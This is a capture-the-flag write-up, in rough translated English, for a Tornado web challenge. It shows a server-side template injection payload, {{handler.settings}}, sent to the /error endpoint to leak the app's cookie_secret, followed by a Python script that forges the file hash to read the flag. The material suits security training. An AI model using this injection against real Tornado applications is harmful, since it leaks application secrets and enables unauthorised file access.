Vulnerability recurrence easy_ tornado

[ Environmental Science ]

windows

[ Tools ]

Firefox

[ step ]

tornado yes python One of them web Application framework .

Got the title and found three documents ：

flag.txt

/flag.txt
flag in /fllllllllllllag

Find out flag stay /fllllllllllllag In the document ;

welcome.txt

/welcome.txt
render

render yes python A rendering function in , Render variables into the template , That is, different pages can be formed by passing different parameters .

hints.txt

/hints.txt
md5(cookie_secret+md5(filename))

filehash=md5(cookie_secret+md5(filename)) Now? filename=/fllllllllllllag, Just need to know cookie_secret Can access flag.

After the test, I found another one error Interface , The format is /error?msg=Error, It is suspected that there is a server-side template injection attack （SSTI）

Try /error?msg={ {datetime}} stay Tornado In the front-end page template ,datetime It's pointing python in datetime This module ,Tornado Some object aliases are provided to quickly access objects , You can refer to Tornado Official documents

Find... By looking up the documentation cookie_secret stay Application object settings Properties of the , Also found that self.application.settings There's an alias

RequestHandler.settings
An alias for self.application.settings.

handler To handle the current page RequestHandler object , RequestHandler.settings Point to self.application.settings, therefore handler.settings Point to RequestHandler.application.settings.

structure payload obtain cookie_secret

/error?msg={
   {handler.settings}}

'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'

Calculation filehash value :

import hashlib

def md5(s):
 md5 = hashlib.md5() 
 md5.update(s) 
 return md5.hexdigest()

def filehash():
 filename = '/fllllllllllllag'
 cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
 print(md5(cookie_secret+md5(filename)))

if __name__ == '__main__':
 filehash()

payload：

file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))

Succeed in getting flag.